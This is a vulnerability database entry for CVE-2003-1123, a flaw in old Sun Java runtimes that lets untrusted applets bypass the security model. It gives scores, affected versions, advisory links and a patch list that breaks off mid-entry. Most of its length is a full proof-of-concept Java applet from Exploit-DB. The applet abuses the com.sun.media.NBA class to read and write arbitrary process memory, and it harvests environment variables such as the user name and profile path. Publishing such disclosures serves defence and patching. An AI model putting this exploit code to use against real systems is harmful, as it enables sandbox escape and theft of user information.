CVE-2003-1123
CVSS 7.5
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:06

[Original] Sun Java Runtime Environment (JRE) and SDK 1.4.0_01 and earlier allows untrusted applets to access certain information within trusted applets, which allows attackers to bypass the restrictions of the Java security model.


[CNNVD] Sun Microsystems Untrusted Applet Java Security Model Violation Vulnerability (CNNVD-200312-467)

        
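        The Java Runtime Environment (JRE) on Solaris provides a reliable runtime environment for Java applications.
        The Java Runtime Environment (JRE) allows untrusted applets to access information within trusted applets; a remote attacker can exploit this vulnerability to bypass the Java security model and access restricted resources.
        No detailed vulnerability information is currently available.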
        

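- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]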

- CPE (affected platforms and products)

cpe:/a:sun:jre:1.3.1_03::windows
cpe:/a:sun:jre:1.2.2::solaris
cpe:/a:sun:jdk:1.4.0_01::windows
cpe:/a:sun:jre:1.3.0:update4:windows
cpe:/a:sun:jdk:1.2.2_10::solaris
cpe:/a:sun:jdk:1.4::solaris
cpe:/a:sun:jre:1.3.0:update5:linux
cpe:/a:sun:jdk:1.3::solaris
cpe:/a:sun:jdk:1.3.0_02::windows
cpe:/a:sun:jre:1.2.2_011::solaris
cpe:/a:sun:jre:1.3.0:update5:solaris
cpe:/a:sun:jdk:1.2.2_12::windows
cpe:/a:sun:jdk:1.3.1_03::solaris
cpe:/a:sun:jre:1.3.0:update5:windows
cpe:/a:sun:jre:1.3.1_03::solaris
cpe:/a:sun:jre:1.3.1:update1:linux
cpe:/a:sun:jre:1.3.1:update4:windows
cpe:/a:sun:jdk:1.3.1_04::windows
cpe:/a:sun:jre:1.2.2_011::linux
cpe:/a:sun:jdk:1.3.0_05::windows
cpe:/a:sun:jre:1.3.1::linux
cpe:/a:sun:jdk:1.2.2_10::windows
cpe:/a:sun:jre:1.2.2_003::linux
cpe:/a:sun:jre:1.3.1:update4:solaris
cpe:/a:sun:jre:1.2.2_012::solaris
cpe:/a:sun:jdk:1.2.2_11::linux
cpe:/a:sun:jdk:1.3.0_02::solaris
cpe:/a:sun:jre:1.3.0:update2:linux
cpe:/a:sun:jdk:1.2.2::solaris
cpe:/a:sun:jdk:1.3.0_05::linux
cpe:/a:sun:jdk:1.3.0_05::solaris
cpe:/a:sun:jre:1.2.2:update10:linux
cpe:/a:sun:jdk:1.2.2_10::linux
cpe:/a:sun:jre:1.3.0::solaris
cpe:/a:sun:jre:1.3.1:update1:windows
cpe:/a:sun:jre:1.3.1:update1:solaris
cpe:/a:sun:jdk:1.3.0_02::linux
cpe:/a:sun:jdk:1.3.1_03::windows
cpe:/a:sun:jre:1.2.2:update10:solaris
cpe:/a:sun:jre:1.4::linux
cpe:/a:sun:jdk:1.3.1_01::linux
cpe:/a:sun:jre:1.3.0::windows
cpe:/a:sun:jre:1.2.2::windows
cpe:/a:sun:jdk:1.4::linux
cpe:/a:sun:jre:1.4::solaris
cpe:/a:sun:jdk:1.3.1_01::solaris
cpe:/a:sun:jdk:1.2.2_11::windows
cpe:/a:sun:jdk:1.2.2_11::solaris
cpe:/a:sun:jre:1.4::windows
cpe:/a:sun:jre:1.2.2_011::windows
cpe:/a:sun:jdk:1.4::windows
cpe:/a:sun:jre:1.3.0:update2:windows
cpe:/a:sun:jdk:1.3.1_03::linux
cpe:/a:sun:jre:1.3.0:update2:solaris
cpe:/a:sun:jre:1.4.0_01::windows
cpe:/a:sun:jre:1.3.0::linux
cpe:/a:sun:jdk:1.3.1_01a::windows
cpe:/a:sun:jre:1.3.1_03::linux
cpe:/a:sun:jre:1.2.2:update10:windows
cpe:/a:sun:jre:1.4.0_01::solaris

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1123
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1123
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-467
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/393292
(VENDOR_ADVISORY)  CERT-VN  VU#393292
http://www.securityfocus.com/bid/7824
(PATCH)  BID  7824
http://sunsolve.sun.com/search/document.do?assetkey=1-26-55100-1
(VENDOR_ADVISORY)  SUNALERT  55100
http://xforce.iss.net/xforce/xfdb/12189
(UNKNOWN)  XF  sun-applet-access-information(12189)
http://securitytracker.com/id?1006935
(UNKNOWN)  SECTRACK  1006935
http://secunia.com/advisories/8958
(UNKNOWN)  SECUNIA  8958

- Vulnerability information

Sun Microsystems Untrusted Applet Java Security Model Violation Vulnerability
High risk  Design error
2003-12-31 00:00:00 2005-10-20 00:00:00
Local
        
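        The Java Runtime Environment (JRE) on Solaris provides a reliable runtime environment for Java applications.
        The Java Runtime Environment (JRE) allows untrusted applets to access information within trusted applets; a remote attacker can exploit this vulnerability to bypass the Java security model and access restricted resources.
        No detailed vulnerability information is currently available.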
        

- Advisories and patches

        Vendor patches:
        Sun
        ---
        The vendor has released upgrade patches that fix this security issue; download them from the vendor's homepage:
        Sun SDK (Solaris Production Release) 1.2.2 _10:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _012:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _011:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _010:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.2.2 _003:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Reference Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris OE Reference Release) 1.2.2_013
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.2.2:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.2.2_13
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _04:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _03:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.3.1 _01a:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Solaris Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1 _01:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.3.1:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.3.1_05
        
        http://java.sun.com/j2se/

        Sun SDK (Windows Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Windows Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Windows Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Solaris Production Release) 1.4 .0_01:
        Sun Upgrade SDK and JRE (Solaris Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun JRE (Linux Production Release) 1.4:
        Sun Upgrade SDK and JRE (Linux Production Release) 1.4.0_02
        
        http://java.sun.com/j2se/

        Sun SDK (Linux Pr

- Vulnerability information (22732)

Sun JRE/SDK 1.x Untrusted Applet Java Security Model Violation Vulnerability (EDBID:22732)
multiple local
2003-06-05 Verified
0 Marc Schoenefeld
N/A
source: http://www.securityfocus.com/bid/7824/info

It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information. 

/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org

*/

import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
class NBAFactory {

		 		 public static String getEnv(String a,long from, long to) {
		 		 		 long pos = findMem(a,from,to);
		 		 		 String ret = "";
		 		 		 if (pos  != -1) {
		 		 		 		 long pos2 = pos+a.length();
		 		 		 		 ret = getString(pos2);
		 		 		 }
		 		 		 return ret;
		 		 }

		 		 public static String getString(long pos) {
		 		 		 int i = 0;
		 		 		 StringBuffer b = new StringBuffer();
		 		 		 char x = 0;
		 		 		 do {
		 		 		 		 x = (char) readMem(pos+i);
		 		 		 		 i++;
		 		 		 		 if (x != 0)
		 		 		 		 b.append(x);

		 		 		 } while (!(x == 0));
		 		 		 return b.toString();
		 		 }

		 		 public static long findMem(String a, long from , long to)  {
		 		 		 char[] ch = a.toCharArray();
		 		 		 for (long pos = from; pos < to ;pos++) {
//		 		 		 		 System.out.println(pos-from+":");
		 		 		 		 int i = 0;
		 		 		 		 int found = 0;
		 		 		 		 for (i = 0; i < ch.length; i++) {
		 		 		 		 		 char x = (char) readMem(pos+i);
//		 		 		 		 		 System.out.println(pos+":"+x);
		 		 		 		 		 if (x == ch[i]) {
		 		 		 		 		 		 found ++;
		 		 		 		 		 }
		 		 		 		 		 else
		 		 		 		 		    break;
		 		 		 		 }
		 		 		 		 if (found == ch.length) {
		 		 		 		 		 return pos;
		 		 		 		 }
		 		 		 }
		 		 		 return -1;
		 		 }

		 		 public static byte readMem(long i) {
		 		 		 byte[] by = new byte[1];
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 long olddata = searcher.data;
		 		 		 searcher.data = i;
		 		 		 searcher.size = 1;
		 		 		 searcher.copyTo(by);
		 		 		 searcher.data = olddata; // keep the finalizer happy
		 		 		 return by[0];
		 		 }

		 		 public static void setMem(long i, char c) {
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 b.data = i;
		 		 		 b.size = 1;
		 		 		 theBytes[c].copyTo(b);
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }

		 		 public static void setMem(long i, byte by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long i, int by) {
		 		 		 setMem(i,(char) by);
		 		 }


		 		 public static void setMem(long l, String s) {
		 		 		 char[] theChars = s.toCharArray();
		 		 		 NBA b = new NBA(byte[].class,1);
		 		 		 long olddata = b.data;
		 		 		 for (int i = 0 ; i  < theChars.length; i++) {
		 		 		 		 b.data = l+i;
		 		 		 		 b.size = 1;
		 		 		 		 theBytes[theChars[i]].copyTo(b);
		 		 		 }
		 		 		 b.data  = olddata; // keep the finalizer happy
		 		 }


		 		 private NBAFactory() {
		 		 }
		 		 public static NBA getByte(char i) {
		 		 		 return theBytes[i];
		 		 }

		 		 public static NBA getByte(int i) {
		 		 		 return theBytes[(char) i];
		 		 }

		 		 public static NBA[] getBytes() {
		 		 		 return theBytes;
		 		 }

		 		 static NBA[] theBytes = new NBA[256];
		 		 static {
		 		 		 for (char i = 0; i < 256; i++) {
//		 		 		 		 System.out.println((byte)i);
		 		 		 		 NBA n = search(i,0x6D340000L, 0x6D46A000L);
		 		 		 		 if (n!=null)
		 		 		 		 		 theBytes[i]= n;
		 		 		 		 else
		 		 		 		 		 System.exit(-1);
		 		 		 }
		 		 }

		 		 static NBA search (char theChar,long start, long end) {
		 		 		 NBA ret = null;
		 		 		 NBA searcher = new NBA(byte[].class,1);
		 		 		 byte[] ba = new byte[1];
		 		 		 for (long i = start; i < end ; i++) {
//		 		 		 		 byte b = readMem(i);
		 		 		 		 searcher.data = i;
		 		 		 		 searcher.copyTo(ba);
//		 		 		 		 if ( b == (byte)theChar) {
		 		 		 		 if ( ba[0] == (byte)theChar) {
		 		 		 		 		 return searcher;
		 		 		 		 }
		 		 		 }
		 		 		 return null;
		 		 }
		 }

public class ReadEnv extends Applet{

		 static NBA base = new NBA(byte[].class,18);  // what's the base pointer ?



		 public static void crash(Object o) {

		   System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework");

		   System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");


		   NBA ret = new NBA(byte[].class,4);
		   long oldret = ret.data;

 		   System.out.println("Base of data: "+Long.toString(base.data,16));

		   String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
		   		 "TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};

		   for (int i = 0; i < envs.length; i++) {
		   		 String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768);
		   		 if (!(o instanceof Applet)) {
		   		 		 System.out.println(envs[i]+":"+val);
		 		 }
		 		 else {
		 		 		 javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val);
		 		 }
		   }


		   //NBAFactory.setMem(pos+10,'A');
		   try {
          System.out.println(System.getProperty("java.class.path"));
		   java.util.Properties p = System.getProperties();

		   p.list(System.out);
		   }
		   catch (java.security.AccessControlException e) {
		   		 System.out.println("Cannot read environment via getProperties:"+e);
		   }

		   //System.out.println(pos);

		   //long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096);
		   //System.out.println(pos2);


		   //byte[] x11 = new byte[8];
		   //ret.copyTo(x11);
		   //for (int i = 0; i < x11.length; i++) {
		   //		 System.out.println(i+":"+x11[i]+(char)x11[i]);
		   //}



		   ret.data = oldret;

		   //ret.data = 0xffff8000;

		   //ret.finalize();
		   //ret.finalize();

		   //NBAFactory.setMem(ret.data-0xffff8000,33);


		   //ret.finalize();

		   /*b.data = base.data;
		   b.size = 16384;*/

		   /*byte[] ba3 = new byte[16384];
 		   b.copyTo(ba3);
		   for (int i = 0; i < ba3.length; i++) {
		   		 System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]);
		   }*/

          /*b.data = olddata;*/



		 }

		 public static void main(String[] a) {
		 		 crash(null);
		 }

		 public void paint(Graphics g) {

		 		 if (init == 0) {
		 		 		 init=1;
		 		 		 crash(this);
		 		 }
		 }

		 static int init = 0;
}
		

- Vulnerability information

15151
Sun Java JRE / SDK Untrusted Applet Java Security Model Bypass

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-06-04 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
